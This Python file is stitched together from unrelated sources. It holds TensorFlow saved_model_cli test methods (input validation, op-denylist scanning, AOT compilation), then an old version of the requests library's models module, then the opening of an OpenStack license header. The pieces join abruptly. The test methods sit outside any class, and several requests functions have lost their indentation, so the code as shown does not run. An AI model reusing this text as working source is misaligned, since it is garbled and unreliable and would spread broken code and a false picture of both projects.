def testRunCommandInputExamplesFeatureValueNotListError(self):
  """Each feature value inside an input example must itself be a list."""
  self.parser = saved_model_cli.create_parser()
  base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
  output_dir = os.path.join(test.get_temp_dir(), 'new_dir')
  args = self.parser.parse_args([
      'run', '--dir', base_path, '--tag_set', 'serve', '--signature_def',
      'regress_x_to_y', '--input_examples', 'inputs=[{"x":8.0,"x2":5.0}]',
      '--outdir', output_dir
  ])
  with self.assertRaisesRegex(ValueError, 'feature value must be a list'):
    saved_model_cli.run(args)
def testRunCommandInputExamplesFeatureBadType(self):
  """Nested lists are not a supported tf.Example feature value type."""
  self.parser = saved_model_cli.create_parser()
  base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
  output_dir = os.path.join(test.get_temp_dir(), 'new_dir')
  args = self.parser.parse_args([
      'run', '--dir', base_path, '--tag_set', 'serve', '--signature_def',
      'regress_x_to_y', '--input_examples', 'inputs=[{"x":[[1],[2]]}]',
      '--outdir', output_dir
  ])
  with self.assertRaisesRegex(ValueError, 'is not supported'):
    saved_model_cli.run(args)
def testRunCommandOutputFileExistError(self):
  """Without --overwrite, `run` raises instead of clobbering an existing
  output file."""
  self.parser = saved_model_cli.create_parser()
  base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
  x = np.array([[1], [2]])
  x_notused = np.zeros((6, 3))
  input_path = os.path.join(test.get_temp_dir(),
                            'testRunCommandOutOverwrite_inputs.npz')
  np.savez(input_path, x0=x, x1=x_notused)
  output_file = os.path.join(test.get_temp_dir(), 'y.npy')
  # Pre-create the output file so the collision check triggers.
  open(output_file, 'a').close()
  args = self.parser.parse_args([
      'run', '--dir', base_path, '--tag_set', 'serve', '--signature_def',
      'serving_default', '--inputs', 'x=' + input_path + '[x0]', '--outdir',
      test.get_temp_dir()
  ])
  with self.assertRaises(RuntimeError):
    saved_model_cli.run(args)
def testRunCommandInputNotGivenError(self):
  """`run` without any --inputs/--input_exprs/--input_examples fails."""
  self.parser = saved_model_cli.create_parser()
  model_dir = test.test_src_dir_path(SAVED_MODEL_PATH)
  run_args = self.parser.parse_args([
      'run', '--dir', model_dir, '--tag_set', 'serve', '--signature_def',
      'serving_default'
  ])
  with self.assertRaises(AttributeError):
    saved_model_cli.run(run_args)
def testRunCommandWithDebuggerEnabled(self):
  """`run --tf_debug` wraps the session in LocalCLIDebugWrapperSession."""
  self.parser = saved_model_cli.create_parser()
  base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
  x = np.array([[1], [2]])
  x_notused = np.zeros((6, 3))
  input_path = os.path.join(test.get_temp_dir(),
                            'testRunCommandNewOutdir_inputs.npz')
  output_dir = os.path.join(test.get_temp_dir(), 'new_dir')
  if os.path.isdir(output_dir):
    shutil.rmtree(output_dir)
  np.savez(input_path, x0=x, x1=x_notused)
  args = self.parser.parse_args([
      'run', '--dir', base_path, '--tag_set', 'serve', '--signature_def',
      'serving_default', '--inputs', 'x=' + input_path + '[x0]', '--outdir',
      output_dir, '--tf_debug'
  ])

  def fake_wrapper_session(sess):
    # Identity stand-in: keeps the run working while the mock records the
    # wrapper being constructed.
    return sess

  with test.mock.patch.object(
      local_cli_wrapper,
      'LocalCLIDebugWrapperSession',
      side_effect=fake_wrapper_session,
      autospec=True) as fake:
    saved_model_cli.run(args)
    fake.assert_called_with(test.mock.ANY)

  y_actual = np.load(os.path.join(output_dir, 'y.npy'))
  # Expected values are determined by the checked-in test model.
  y_expected = np.array([[2.5], [3.0]])
  self.assertAllClose(y_expected, y_actual)
def testScanCommand(self):
  """`scan` reports when a SavedModel contains no denylisted ops."""
  self.parser = saved_model_cli.create_parser()
  model_dir = test.test_src_dir_path(SAVED_MODEL_PATH)
  args = self.parser.parse_args(['scan', '--dir', model_dir])
  with captured_output() as (out, _):
    saved_model_cli.scan(args)
  self.assertIn('does not contain denylisted ops', out.getvalue().strip())
def testScanCommandFoundDenylistedOp(self):
  """`scan` names denylisted ops found in the graph.

  The module-level _OP_DENYLIST is temporarily replaced so the stock test
  model (which contains VariableV2 ops) triggers a hit.
  """
  self.parser = saved_model_cli.create_parser()
  base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
  args = self.parser.parse_args(
      ['scan', '--dir', base_path, '--tag_set', 'serve'])
  op_denylist = saved_model_cli._OP_DENYLIST
  saved_model_cli._OP_DENYLIST = set(['VariableV2'])
  try:
    with captured_output() as (out, _):
      saved_model_cli.scan(args)
  finally:
    # Always restore the patched global, even if scan() raises, so later
    # tests are not affected by the modified denylist.
    saved_model_cli._OP_DENYLIST = op_denylist
  output = out.getvalue().strip()
  self.assertIn('\'VariableV2\'', output)
def testAOTCompileCPUWrongSignatureDefKey(self):
  """aot_compile_cpu fails clearly when the signature_def key is missing."""
  if not test.is_built_with_xla():
    self.skipTest('Skipping test because XLA is not compiled in.')
  self.parser = saved_model_cli.create_parser()
  base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
  output_dir = os.path.join(test.get_temp_dir(), 'aot_compile_cpu_dir')
  args = self.parser.parse_args([
      'aot_compile_cpu', '--dir', base_path, '--tag_set', 'serve',
      '--output_prefix', output_dir, '--cpp_class', 'Compiled',
      '--signature_def_key', 'MISSING'
  ])
  with self.assertRaisesRegex(ValueError, 'Unable to find signature_def'):
    saved_model_cli.aot_compile_cpu(args)
class AOTCompileDummyModel(tracking.AutoTrackable):
  """Model compatible with XLA compilation."""

  def __init__(self):
    # `var` is only read by the functions below; `write_var` is also
    # assigned by func_write.
    self.var = variables.Variable(1.0, name='my_var')
    self.write_var = variables.Variable(1.0, name='write_var')

  @def_function.function(input_signature=[
      tensor_spec.TensorSpec(shape=(2, 2), dtype=dtypes.float32),
      # Test unused inputs.
      tensor_spec.TensorSpec(shape=(), dtype=dtypes.float32),
  ])
  def func2(self, x, y):
    # `y` is deliberately unused so freezing can prune it.
    del y
    return {'res': x + self.var}

  @def_function.function(input_signature=[
      # Test large inputs.
      tensor_spec.TensorSpec(shape=(2048, 16), dtype=dtypes.float32),
      tensor_spec.TensorSpec(shape=(), dtype=dtypes.float32),
  ])
  def func3(self, x, y):
    del y
    return {'res': x + self.var}

  @def_function.function(input_signature=[
      tensor_spec.TensorSpec(shape=(), dtype=dtypes.float32),
      tensor_spec.TensorSpec(shape=(), dtype=dtypes.float32),
  ])
  def func_write(self, x, y):
    # Mutates write_var, so its generated setter must not be const.
    del y
    self.write_var.assign(x + self.var)
    return {'res': self.write_var}
@parameterized.named_parameters(
    ('VariablesToFeedNone', '', 'func2', None),
    ('VariablesToFeedNoneTargetAarch64Linux', '', 'func2',
     'aarch64-none-linux-gnu'),
    ('VariablesToFeedNoneTargetAarch64Android', '', 'func2',
     'aarch64-none-android'),
    ('VariablesToFeedAll', 'all', 'func2', None),
    ('VariablesToFeedMyVar', 'my_var', 'func2', None),
    ('VariablesToFeedNoneLargeConstant', '', 'func3', None),
    ('WriteToWriteVar', 'all', 'func_write', None),
)
def testAOTCompileCPUFreezesAndCompiles(
    self, variables_to_feed, func, target_triple):
  """aot_compile_cpu freezes the model and emits object/header/makefile.

  Verifies that the unused signature input is pruned (with a warning),
  that the expected build artifacts exist, and that generated variable
  setters are const for read-only variables but non-const for written
  ones.
  """
  if not test.is_built_with_xla():
    self.skipTest('Skipping test because XLA is not compiled in.')

  saved_model_dir = os.path.join(test.get_temp_dir(), 'dummy_model')
  dummy_model = self.AOTCompileDummyModel()
  func = getattr(dummy_model, func)  # resolve method name -> bound function
  with self.cached_session():
    self.evaluate(dummy_model.var.initializer)
    self.evaluate(dummy_model.write_var.initializer)
    save.save(dummy_model, saved_model_dir, signatures={'func': func})

  self.parser = saved_model_cli.create_parser()
  output_prefix = os.path.join(test.get_temp_dir(), 'aot_compile_cpu_dir/out')
  args = [  # Use the default serving signature_key.
      'aot_compile_cpu', '--dir', saved_model_dir, '--tag_set', 'serve',
      '--signature_def_key', 'func', '--output_prefix', output_prefix,
      '--variables_to_feed', variables_to_feed, '--cpp_class', 'Generated'
  ]
  if target_triple:
    args.extend(['--target_triple', target_triple])
  args = self.parser.parse_args(args)
  with test.mock.patch.object(logging, 'warn') as captured_warn:
    saved_model_cli.aot_compile_cpu(args)
  self.assertRegex(
      str(captured_warn.call_args),
      'Signature input key \'y\'.*has been pruned while freezing the graph.')
  self.assertTrue(file_io.file_exists('{}.o'.format(output_prefix)))
  self.assertTrue(file_io.file_exists('{}.h'.format(output_prefix)))
  self.assertTrue(file_io.file_exists('{}_metadata.o'.format(output_prefix)))
  self.assertTrue(
      file_io.file_exists('{}_makefile.inc'.format(output_prefix)))
  header_contents = file_io.read_file_to_string('{}.h'.format(output_prefix))
  self.assertIn('class Generated', header_contents)
  self.assertIn('arg_feed_x_data', header_contents)
  self.assertIn('result_fetch_res_data', header_contents)
  # arg_y got filtered out as it's not used by the output.
  self.assertNotIn('arg_feed_y_data', header_contents)
  if variables_to_feed:
    # Read-only-variables' setters preserve constness.
    self.assertIn('set_var_param_my_var_data(const float', header_contents)
    self.assertNotIn('set_var_param_my_var_data(float', header_contents)
  if func == dummy_model.func_write:
    # Writeable variables setters do not preserve constness.
    self.assertIn('set_var_param_write_var_data(float', header_contents)
    self.assertNotIn('set_var_param_write_var_data(const float',
                     header_contents)
  makefile_contents = file_io.read_file_to_string(
      '{}_makefile.inc'.format(output_prefix))
  self.assertIn('-D_GLIBCXX_USE_CXX11_ABI=', makefile_contents)
# Run the test suite when executed directly as a script.
if __name__ == '__main__':
  test.main()
# ---------------------------------------------------------------------------
# -*- coding: utf-8 -*-
"""
requests.models
~~~~~~~~~~~~~~~
This module contains the primary objects that power Requests.
"""
import json
import os
from datetime import datetime
from .hooks import dispatch_hook, HOOKS
from .structures import CaseInsensitiveDict
from .status_codes import codes
from .auth import HTTPBasicAuth, HTTPProxyAuth
from .cookies import cookiejar_from_dict, extract_cookies_to_jar, get_cookie_header
from .packages.urllib3.exceptions import MaxRetryError, LocationParseError
from .packages.urllib3.exceptions import SSLError as _SSLError
from .packages.urllib3.exceptions import HTTPError as _HTTPError
from .packages.urllib3 import connectionpool, poolmanager
from .packages.urllib3.filepost import encode_multipart_formdata
from .defaults import SCHEMAS
from .exceptions import (
ConnectionError, HTTPError, RequestException, Timeout, TooManyRedirects,
URLRequired, SSLError, MissingSchema, InvalidSchema, InvalidURL)
from .utils import (
get_encoding_from_headers, stream_untransfer, guess_filename, requote_uri,
stream_decode_response_unicode, get_netrc_auth, get_environ_proxies,
DEFAULT_CA_BUNDLE_PATH)
from .compat import (
cookielib, urlparse, urlunparse, urljoin, urlsplit, urlencode, str, bytes,
StringIO, is_py2)
# Import chardet if it is available.
try:
import chardet
# hush pyflakes
chardet
except ImportError:
chardet = None
# HTTP status codes that are treated as redirects by _build_response.
REDIRECT_STATI = (codes.moved, codes.found, codes.other, codes.temporary_moved)
# Chunk size in bytes for streaming content; presumably used by Response
# iterators defined later in this module — not visible in this chunk.
CONTENT_CHUNK_SIZE = 10 * 1024
class Request(object):
"""The :class:`Request <Request>` object. It carries out all functionality of
Requests. Recommended interface is with the Requests functions.
"""
def __init__(self,
             url=None,
             headers=None,
             files=None,
             method=None,
             data=None,
             params=None,
             auth=None,
             cookies=None,
             timeout=None,
             redirect=False,
             allow_redirects=False,
             proxies=None,
             hooks=None,
             config=None,
             prefetch=False,
             _poolmanager=None,
             verify=None,
             session=None,
             cert=None):
    """Create a new :class:`Request <Request>`.

    ``headers``, ``data`` and ``params`` previously defaulted to shared
    mutable ``dict()`` instances; they now default to ``None`` (treated as
    an empty dict), which is backward compatible for callers and removes
    the shared-mutable-default pitfall.
    """

    #: Dictionary of configurations for this request.
    self.config = dict(config or [])

    #: Float describes the timeout of the request.
    #  (Use socket.setdefaulttimeout() as fallback)
    self.timeout = timeout

    #: Request URL.
    self.url = url

    #: Dictionary of HTTP Headers to attach to the :class:`Request <Request>`.
    self.headers = dict(headers or [])

    #: Dictionary of files to multipart upload (``{filename: content}``).
    self.files = None

    #: HTTP Method to use.
    self.method = method

    #: Dictionary, bytes or file stream of request body data to attach to the
    #: :class:`Request <Request>`.
    self.data = None

    #: Dictionary or byte of querystring data to attach to the
    #: :class:`Request <Request>`. The dictionary values can be lists for
    #: representing multivalued query parameters.
    self.params = None

    #: True if :class:`Request <Request>` is part of a redirect chain (disables
    #: history and HTTPError storage).
    self.redirect = redirect

    #: Set to True if full redirects are allowed (e.g. re-POST-ing of data at
    #: new ``Location``)
    self.allow_redirects = allow_redirects

    # Dictionary mapping protocol to the URL of the proxy (e.g.
    # {'http': 'foo.bar:3128'})
    self.proxies = dict(proxies or [])

    # If no proxies are given, allow configuration by environment variables
    # HTTP_PROXY and HTTPS_PROXY.
    if not self.proxies and self.config.get('trust_env'):
        self.proxies = get_environ_proxies()

    # Normalize None to empty containers so later code (_encode_files calls
    # self.data.copy()) can assume a dict-like value.
    self.data = {} if data is None else data
    self.params = {} if params is None else params
    self.files = files

    #: :class:`Response <Response>` instance, containing
    #: content and metadata of HTTP Response, once :attr:`sent <send>`.
    self.response = Response()

    #: Authentication tuple or object to attach to :class:`Request <Request>`.
    self.auth = auth

    #: CookieJar to attach to :class:`Request <Request>`.
    if isinstance(cookies, cookielib.CookieJar):
        self.cookies = cookies
    else:
        self.cookies = cookiejar_from_dict(cookies)

    #: True if Request has been sent.
    self.sent = False

    #: Event-handling hooks.
    self.hooks = {}

    for event in HOOKS:
        self.hooks[event] = []

    hooks = hooks or {}

    for (k, v) in list(hooks.items()):
        self.register_hook(event=k, hook=v)

    #: Session.
    self.session = session

    #: SSL Verification.
    self.verify = verify

    #: SSL Certificate
    self.cert = cert

    #: Prefetch response content
    self.prefetch = prefetch

    # Re-wrap the headers case-insensitively; configured base_headers are
    # merged in without overriding caller-supplied values.
    if headers:
        headers = CaseInsensitiveDict(self.headers)
    else:
        headers = CaseInsensitiveDict()

    # Add configured base headers.
    for (k, v) in list(self.config.get('base_headers', {}).items()):
        if k not in headers:
            headers[k] = v

    self.headers = headers
    self._poolmanager = _poolmanager
def __repr__(self):
return '<Request [%s]>' % (self.method)
def _build_response(self, resp):
    """Build internal :class:`Response <Response>` object
    from given response, following redirects as configured.

    Sets ``self.response`` (with ``.request`` back-reference) and, when
    redirects were followed, ``.history`` with the intermediate responses.
    Raises :class:`TooManyRedirects` when ``config['max_redirects']`` is
    exceeded.
    """

    def build(resp):
        # Translate a raw urllib3-level response into a Response object.
        response = Response()

        # Pass settings over.
        response.config = self.config

        if resp:
            # Fallback to None if there's no status_code, for whatever reason.
            response.status_code = getattr(resp, 'status', None)

            # Make headers case-insensitive.
            response.headers = CaseInsensitiveDict(getattr(resp, 'headers', None))

            # Set encoding.
            response.encoding = get_encoding_from_headers(response.headers)

            # Add new cookies from the server. Don't if configured not to
            if self.config.get('store_cookies'):
                extract_cookies_to_jar(self.cookies, self, resp)

            # Save cookies in Response.
            response.cookies = self.cookies

            # Save cookies in Session.
            for cookie in self.cookies:
                self.session.cookies.set_cookie(cookie)

            # No exceptions were harmed in the making of this request.
            response.error = getattr(resp, 'error', None)

        # Save original response for later.
        response.raw = resp
        if isinstance(self.full_url, bytes):
            response.url = self.full_url.decode('utf-8')
        else:
            response.url = self.full_url

        return response

    history = []

    r = build(resp)

    if r.status_code in REDIRECT_STATI and not self.redirect:

        # Follow Location headers until a non-redirect response arrives.
        # 303 (see_other) is always followed; other redirects only when
        # allow_redirects is set.
        while (('location' in r.headers) and
               ((r.status_code is codes.see_other) or (self.allow_redirects))):

            r.content  # Consume socket so it can be released

            if not len(history) < self.config.get('max_redirects'):
                raise TooManyRedirects()

            # Release the connection back into the pool.
            r.raw.release_conn()

            history.append(r)

            url = r.headers['location']
            data = self.data
            files = self.files

            # Handle redirection without scheme (see: RFC 1808 Section 4)
            if url.startswith('//'):
                parsed_rurl = urlparse(r.url)
                url = '%s:%s' % (parsed_rurl.scheme, url)

            # Facilitate non-RFC2616-compliant 'location' headers
            # (e.g. '/path/to/resource' instead of 'http://domain.tld/path/to/resource')
            if not urlparse(url).netloc:
                url = urljoin(r.url,
                              # Compliant with RFC3986, we percent
                              # encode the url.
                              requote_uri(url))

            # http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html#sec10.3.4
            if r.status_code is codes.see_other:
                method = 'GET'
                data = None
                files = None
            else:
                method = self.method

            # Do what the browsers do if strict_mode is off...
            if (not self.config.get('strict_mode')):

                if r.status_code in (codes.moved, codes.found) and self.method == 'POST':
                    method = 'GET'
                    data = None
                    files = None

                if (r.status_code == 303) and self.method != 'HEAD':
                    method = 'GET'
                    data = None
                    files = None

            # Remove the cookie headers that were sent.
            headers = self.headers
            try:
                del headers['Cookie']
            except KeyError:
                pass

            # Re-issue the request at the new location, marking it as part
            # of a redirect chain (redirect=True disables nested history).
            request = Request(
                url=url,
                headers=headers,
                files=files,
                method=method,
                params=self.session.params,
                auth=self.auth,
                cookies=self.cookies,
                redirect=True,
                data=data,
                config=self.config,
                timeout=self.timeout,
                _poolmanager=self._poolmanager,
                proxies=self.proxies,
                verify=self.verify,
                session=self.session,
                cert=self.cert
            )

            request.send()
            r = request.response

        r.history = history

    self.response = r
    self.response.request = self
@staticmethod
def _encode_params(data):
"""Encode parameters in a piece of data.
Will successfully encode parameters when passed as a dict or a list of
2-tuples. Order is retained if data is a list of 2-tuples but abritrary
if parameters are supplied as a dict.
"""
if isinstance(data, bytes):
return data
if isinstance(data, str):
return data
elif hasattr(data, 'read'):
return data
elif hasattr(data, '__iter__'):
try:
dict(data)
except ValueError:
raise ValueError('Unable to encode lists with elements that are not 2-tuples.')
params = list(data.items() if isinstance(data, dict) else data)
result = []
for k, vs in params:
for v in isinstance(vs, list) and vs or [vs]:
result.append(
(k.encode('utf-8') if isinstance(k, str) else k,
v.encode('utf-8') if isinstance(v, str) else v))
return urlencode(result, doseq=True)
else:
return data
def _encode_files(self, files):
    """Build a multipart/form-data body from ``files`` plus ``self.data``.

    :returns: a ``(body, content_type)`` tuple, or ``None`` when there are
        no files or the body data is already a plain string.
    """

    if (not files) or isinstance(self.data, str):
        return None

    try:
        fields = self.data.copy()
    except AttributeError:
        # self.data is not a dict (e.g. a list of 2-tuples); coerce it.
        fields = dict(self.data)

    for (k, v) in list(files.items()):
        # support for explicit filename
        if isinstance(v, (tuple, list)):
            fn, fp = v
        else:
            fn = guess_filename(v) or k
            fp = v
        if isinstance(fp, (bytes, str)):
            fp = StringIO(fp)
        # NOTE(review): reads each file fully into memory -- fine for small
        # uploads, problematic for large ones.
        fields.update({k: (fn, fp.read())})

    (body, content_type) = encode_multipart_formdata(fields)

    return (body, content_type)
@property
def full_url(self):
    """Build the actual URL to use.

    Validates the scheme, IDNA-encodes the host, appends the encoded
    ``self.params`` to the query string and, unless ``encode_uri`` is
    disabled in the config, requotes the result.

    :raises URLRequired: if no URL is set.
    :raises MissingSchema: if the URL has no scheme.
    :raises InvalidSchema: if the scheme is not in SCHEMAS.
    """

    if not self.url:
        raise URLRequired()

    url = self.url

    # Support for unicode domain names and paths.
    scheme, netloc, path, params, query, fragment = urlparse(url)

    if not scheme:
        raise MissingSchema("Invalid URL %r: No schema supplied" % url)

    if not scheme in SCHEMAS:
        raise InvalidSchema("Invalid scheme %r" % scheme)

    # IDNA-encode the host so non-ASCII domain names work.
    netloc = netloc.encode('idna').decode('utf-8')

    if not path:
        path = '/'

    if is_py2:
        # On Python 2, urlunparse expects byte strings.
        if isinstance(scheme, str):
            scheme = scheme.encode('utf-8')

        if isinstance(netloc, str):
            netloc = netloc.encode('utf-8')

        if isinstance(path, str):
            path = path.encode('utf-8')

        if isinstance(params, str):
            params = params.encode('utf-8')

        if isinstance(query, str):
            query = query.encode('utf-8')

        if isinstance(fragment, str):
            fragment = fragment.encode('utf-8')

    url = (urlunparse([scheme, netloc, path, params, query, fragment]))

    # Merge self.params into any query string already present in the URL.
    enc_params = self._encode_params(self.params)
    if enc_params:
        if urlparse(url).query:
            url = '%s&%s' % (url, enc_params)
        else:
            url = '%s?%s' % (url, enc_params)

    if self.config.get('encode_uri', True):
        url = requote_uri(url)

    return url
@property
def path_url(self):
    """Build the path (plus query string) portion of the URL to use."""

    split = urlsplit(self.full_url)

    # Proxies need the absolute URL, not just the path.
    if split.scheme in self.proxies:
        return self.full_url

    parts = [split.path or '/']

    if split.query:
        parts.append('?')
        parts.append(split.query)

    return ''.join(parts)
def register_hook(self, event, hook):
"""Properly register a hook."""
self.hooks[event].append(hook)
def deregister_hook(self, event, hook):
"""Deregister a previously registered hook.
Returns True if the hook existed, False if not.
"""
try:
self.hooks[event].remove(hook)
return True
except ValueError:
return False
    def send(self, anyway=False, prefetch=False):
        """Sends the request. Returns True if successful, False if not.
        If there was an HTTPError during transmission,
        self.response.status_code will contain the HTTPError code.

        Once a request is successfully sent, `sent` will equal True.

        :param anyway: If True, request will be sent, even if it has
            already been sent.
        :param prefetch: If True, the response body is read immediately
            so the connection can be released.
        """
        # Build the URL
        url = self.full_url

        # Pre-request hook.
        r = dispatch_hook('pre_request', self.hooks, self)
        self.__dict__.update(r.__dict__)

        # Logging
        if self.config.get('verbose'):
            # 'verbose' is expected to be a writable file-like object.
            self.config.get('verbose').write('%s %s %s\n' % (
                datetime.now().isoformat(), self.method, url
            ))

        # Nottin' on you.
        body = None
        content_type = None

        # Use .netrc auth if none was provided.
        if not self.auth and self.config.get('trust_env'):
            self.auth = get_netrc_auth(url)

        if self.auth:
            if isinstance(self.auth, tuple) and len(self.auth) == 2:
                # special-case basic HTTP auth
                self.auth = HTTPBasicAuth(*self.auth)

            # Allow auth to make its changes.
            r = self.auth(self)

            # Update self to reflect the auth changes.
            self.__dict__.update(r.__dict__)

        # Multi-part file uploads.
        if self.files:
            (body, content_type) = self._encode_files(self.files)
        else:
            if self.data:
                body = self._encode_params(self.data)
                # Raw strings / file-like bodies carry no implied encoding;
                # only form-encoded dict data gets the urlencoded type.
                if isinstance(self.data, str) or hasattr(self.data, 'read'):
                    content_type = None
                else:
                    content_type = 'application/x-www-form-urlencoded'

        # Add content-type if it wasn't explicitly provided.
        if (content_type) and (not 'content-type' in self.headers):
            self.headers['Content-Type'] = content_type

        # Select a connection: proxied or direct (keep-alive vs one-shot).
        _p = urlparse(url)
        no_proxy = filter(lambda x:x.strip(), self.proxies.get('no', '').split(','))
        proxy = self.proxies.get(_p.scheme)

        if proxy and not any(map(_p.netloc.endswith, no_proxy)):
            conn = poolmanager.proxy_from_url(proxy)
            _proxy = urlparse(proxy)
            if '@' in _proxy.netloc:
                # Credentials embedded in the proxy URL become proxy auth.
                auth, url = _proxy.netloc.split('@', 1)
                self.proxy_auth = HTTPProxyAuth(*auth.split(':', 1))
                r = self.proxy_auth(self)
                self.__dict__.update(r.__dict__)
        else:
            # Check to see if keep_alive is allowed.
            try:
                if self.config.get('keep_alive'):
                    conn = self._poolmanager.connection_from_url(url)
                else:
                    conn = connectionpool.connection_from_url(url)
                    self.headers['Connection'] = 'close'
            except LocationParseError as e:
                raise InvalidURL(e)

        # TLS verification setup: pick a CA bundle, or disable checks.
        if url.startswith('https') and self.verify:
            cert_loc = None

            # Allow self-specified cert location.
            if self.verify is not True:
                cert_loc = self.verify

            # Look for configuration.
            if not cert_loc and self.config.get('trust_env'):
                cert_loc = os.environ.get('REQUESTS_CA_BUNDLE')

            # Curl compatibility.
            if not cert_loc and self.config.get('trust_env'):
                cert_loc = os.environ.get('CURL_CA_BUNDLE')

            if not cert_loc:
                cert_loc = DEFAULT_CA_BUNDLE_PATH

            if not cert_loc:
                raise Exception("Could not find a suitable SSL CA certificate bundle.")

            conn.cert_reqs = 'CERT_REQUIRED'
            conn.ca_certs = cert_loc
        else:
            conn.cert_reqs = 'CERT_NONE'
            conn.ca_certs = None

        # Client-side certificate (cert, key) pair or single bundle file.
        if self.cert and self.verify:
            if len(self.cert) == 2:
                conn.cert_file = self.cert[0]
                conn.key_file = self.cert[1]
            else:
                conn.cert_file = self.cert

        if not self.sent or anyway:
            # Skip if 'cookie' header is explicitly set.
            if 'cookie' not in self.headers:
                cookie_header = get_cookie_header(self.cookies, self)
                if cookie_header is not None:
                    self.headers['Cookie'] = cookie_header

            # Pre-send hook.
            r = dispatch_hook('pre_send', self.hooks, self)
            self.__dict__.update(r.__dict__)

            # catch urllib3 exceptions and throw Requests exceptions
            try:
                # Send the request.
                r = conn.urlopen(
                    method=self.method,
                    url=self.path_url,
                    body=body,
                    headers=self.headers,
                    redirect=False,
                    assert_same_host=False,
                    preload_content=False,
                    decode_content=False,
                    retries=self.config.get('max_retries', 0),
                    timeout=self.timeout,
                )
                self.sent = True

            except MaxRetryError as e:
                raise ConnectionError(e)

            except (_SSLError, _HTTPError) as e:
                # NOTE(review): a non-SSL _HTTPError is unconditionally
                # reported as a timeout here — presumably the only expected
                # _HTTPError at this layer; confirm against urllib3 version.
                if self.verify and isinstance(e, _SSLError):
                    raise SSLError(e)

                raise Timeout('Request timed out.')

            # build_response can throw TooManyRedirects
            self._build_response(r)

            # Response manipulation hook.
            self.response = dispatch_hook('response', self.hooks, self.response)

            # Post-request hook.
            r = dispatch_hook('post_request', self.hooks, self)
            self.__dict__.update(r.__dict__)

            # If prefetch is True, mark content as consumed.
            if prefetch or self.prefetch:
                # Save the response.
                self.response.content

            if self.config.get('danger_mode'):
                self.response.raise_for_status()

        return self.sent
class Response(object):
    """The core :class:`Response <Response>` object. All
    :class:`Request <Request>` objects contain a
    :class:`response <Response>` attribute, which is an instance
    of this class.
    """

    def __init__(self):

        # False (not None) marks "not read yet"; None marks "no content".
        self._content = False
        self._content_consumed = False

        #: Integer Code of responded HTTP Status.
        self.status_code = None

        #: Case-insensitive Dictionary of Response Headers.
        #: For example, ``headers['content-encoding']`` will return the
        #: value of a ``'Content-Encoding'`` response header.
        self.headers = CaseInsensitiveDict()

        #: File-like object representation of response (for advanced usage).
        self.raw = None

        #: Final URL location of Response.
        self.url = None

        #: Resulting :class:`HTTPError` of request, if one occurred.
        self.error = None

        #: Encoding to decode with when accessing r.text.
        self.encoding = None

        #: A list of :class:`Response <Response>` objects from
        #: the history of the Request. Any redirect responses will end
        #: up here.
        self.history = []

        #: The :class:`Request <Request>` that created the Response.
        self.request = None

        #: A CookieJar of Cookies the server sent back.
        self.cookies = None

        #: Dictionary of configurations for this request.
        self.config = {}

    def __repr__(self):
        return '<Response [%s]>' % (self.status_code)

    def __bool__(self):
        """Returns true if :attr:`status_code` is 'OK'."""
        return self.ok

    # Python 2 truthiness hook; kept alongside __bool__ for compatibility.
    def __nonzero__(self):
        """Returns true if :attr:`status_code` is 'OK'."""
        return self.ok

    @property
    def ok(self):
        """True when no error is stored and the status is not 4xx/5xx."""
        try:
            self.raise_for_status()
        except RequestException:
            return False
        return True

    def iter_content(self, chunk_size=1, decode_unicode=False):
        """Iterates over the response data. This avoids reading the content
        at once into memory for large responses. The chunk size is the number
        of bytes it should read into memory. This is not necessarily the
        length of each item returned as decoding can take place.

        :raises RuntimeError: if the content was already consumed.
        """
        if self._content_consumed:
            raise RuntimeError(
                'The content for this response was already consumed'
            )

        def generate():
            while 1:
                chunk = self.raw.read(chunk_size)
                if not chunk:
                    break
                yield chunk
            self._content_consumed = True

        gen = stream_untransfer(generate(), self)

        if decode_unicode:
            gen = stream_decode_response_unicode(gen, self)

        return gen

    def iter_lines(self, chunk_size=10 * 1024, decode_unicode=None):
        """Iterates over the response data, one line at a time. This
        avoids reading the content at once into memory for large
        responses.
        """
        pending = None

        for chunk in self.iter_content(
            chunk_size=chunk_size,
            decode_unicode=decode_unicode):

            if pending is not None:
                chunk = pending + chunk
            lines = chunk.splitlines()

            # A chunk ending mid-line leaves its tail pending until the
            # next chunk arrives; a chunk ending on a newline does not.
            if lines and lines[-1] and chunk and lines[-1][-1] == chunk[-1]:
                pending = lines.pop()
            else:
                pending = None

            for line in lines:
                yield line

        if pending is not None:
            yield pending

    @property
    def content(self):
        """Content of the response, in bytes."""

        if self._content is False:
            # Read the contents.
            try:
                if self._content_consumed:
                    raise RuntimeError(
                        'The content for this response was already consumed')

                # BUGFIX: 'is 0' compared identity and only worked due to
                # CPython's small-int caching; use equality instead.
                if self.status_code == 0:
                    self._content = None
                else:
                    self._content = bytes().join(self.iter_content(CONTENT_CHUNK_SIZE)) or bytes()

            except AttributeError:
                # No raw stream to read from.
                self._content = None

        self._content_consumed = True
        return self._content

    @property
    def text(self):
        """Content of the response, in unicode.

        if Response.encoding is None and chardet module is available, encoding
        will be guessed.
        """

        # Try charset from content-type
        content = None
        encoding = self.encoding

        if not self.content:
            return str('')

        # Fallback to auto-detected encoding.
        if self.encoding is None:
            if chardet is not None:
                encoding = chardet.detect(self.content)['encoding']

        # Decode unicode from given encoding.
        try:
            content = str(self.content, encoding, errors='replace')
        except LookupError:
            # A LookupError is raised if the encoding was not found which could
            # indicate a misspelling or similar mistake.
            #
            # So we try blindly encoding.
            content = str(self.content, errors='replace')

        return content

    @property
    def json(self):
        """Returns the json-encoded content of a request, if any."""
        try:
            return json.loads(self.text or self.content)
        except ValueError:
            return None

    def raise_for_status(self, allow_redirects=True):
        """Raises stored :class:`HTTPError` or :class:`URLError`, if one occurred.

        :param allow_redirects: if False, a 3xx status also raises.
        """

        if self.error:
            raise self.error

        if (self.status_code >= 300) and (self.status_code < 400) and not allow_redirects:
            http_error = HTTPError('%s Redirection' % self.status_code)
            http_error.response = self
            raise http_error

        elif (self.status_code >= 400) and (self.status_code < 500):
            http_error = HTTPError('%s Client Error' % self.status_code)
            http_error.response = self
            raise http_error

        elif (self.status_code >= 500) and (self.status_code < 600):
            http_error = HTTPError('%s Server Error' % self.status_code)
            http_error.response = self
            raise http_error
| |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
